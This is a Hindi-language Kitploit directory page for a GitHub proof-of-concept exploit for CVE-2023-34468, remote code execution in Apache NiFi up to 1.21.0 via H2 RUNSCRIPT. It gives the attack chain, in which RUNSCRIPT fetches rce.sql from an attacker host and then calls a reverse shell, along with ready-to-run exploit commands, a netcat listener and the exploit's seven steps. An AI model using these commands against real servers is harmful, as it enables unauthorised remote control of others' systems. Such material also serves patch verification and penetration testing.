Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-34468-POC — CVE-2023-34468 के लिए PoC एक्सप्लॉइट — Apache NiFi <= 1.21.0 में H2 RUNSCRIPT के माध्यम से RCE | Kitploit
उपकरण/GitHubGitHub/sbouabid-sec/cve-2023-34468-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubsbouabid-sec/cve-2023-34468-poc

CVE-2023-34468-POC

CVE-2023-34468 के लिए PoC एक्सप्लॉइट — Apache NiFi <= 1.21.0 में H2 RUNSCRIPT के माध्यम से RCE

रिपॉजिटरी देखें
43 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-34468 — Apache NiFi 1.21.0 RCE PoC

Apache NiFi <= 1.21.0 में H2 Database RUNSCRIPT के माध्यम से रिमोट कोड एक्ज़ीक्यूशन


भेद्यता

Apache NiFi अपने साथ डिफ़ॉल्ट रूप से एक H2 डेटाबेस JAR बंडल करके भेजता है। DBCPConnectionPool कंट्रोलर सर्विस को इस H2 ड्राइवर का उपयोग करने के लिए कॉन्फ़िगर किया जा सकता है। H2 एक RUNSCRIPT स्टेटमेंट का समर्थन करता है जो किसी रिमोट URL से SQL फ़ाइल लाकर निष्पादित करता है। वह SQL फ़ाइल CREATE ALIAS के माध्यम से मनमाना Java कोड परिभाषित कर सकती है और उसे सर्वर OS पर निष्पादित कर सकती है।

अटैक श्रृंखला:

root@kitploit:~
DBCPConnectionPool (H2 driver)
    → ExecuteSQL processor
        → RUNSCRIPT FROM http://attacker/rce.sql
            → CREATE ALIAS (Java method)
                → CALL SHELLEXEC (reverse shell)

प्रभावित संस्करण

सॉफ़्टवेयरसंस्करण
Apache NiFi<= 1.21.0
इसमें ठीक हुआ1.21.1+
Javaकोई भी (बंडल किया हुआ)

आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी → pip install requests
  • अनाम राइट एक्सेस या मान्य क्रेडेंशियल वाला NiFi टारगेट
  • रिवर्स शेल कॉलबैक के लिए टारगेट से आपकी मशीन तक नेटवर्क एक्सेस

उपयोग

root@kitploit:~
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup

आर्ग्युमेंट


सेटअप

टर्मिनल 1 — लिसनर:

root@kitploit:~
nc -lvnp 4444

टर्मिनल 2 — एक्सप्लॉइट:

root@kitploit:~
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup

PoC क्या करता है

root@kitploit:~
Step 1  अनाम एक्सेस और राइट अनुमतियाँ जाँचें
Step 2  रूट Process Group ID प्राप्त करें
Step 3  दुर्भावनापूर्ण DBCPConnectionPool कंट्रोलर सर्विस बनाएँ
Step 4  कंट्रोलर सर्विस सक्षम करें (रिवीज़न वर्ज़निंग संभालता है)
Step 5  ExecuteSQL प्रोसेसर बनाएँ जो हमारे HTTP सर्वर पर rce.sql की ओर इशारा करे
Step 6  प्रोसेसर शुरू करें → NiFi rce.sql लाता है → शेल कॉलबैक
Step 7  सफ़ाई (यदि --cleanup फ़्लैग सेट है)
टूल डाउनलोड करें
आर्ग्युमेंटडिफ़ॉल्टविवरण
--targethttp://NiFi.target.comटारगेट NiFi का बेस URL
--lhost10.10.10.10आपका IP (tun0)
--lport4444रिवर्स शेल लिसनर पोर्ट
--http-port80rce.sql सर्व करने के लिए पोर्ट
--cleanupFalseरन के बाद बनाई गई आर्टिफ़ैक्ट्स हटाएँ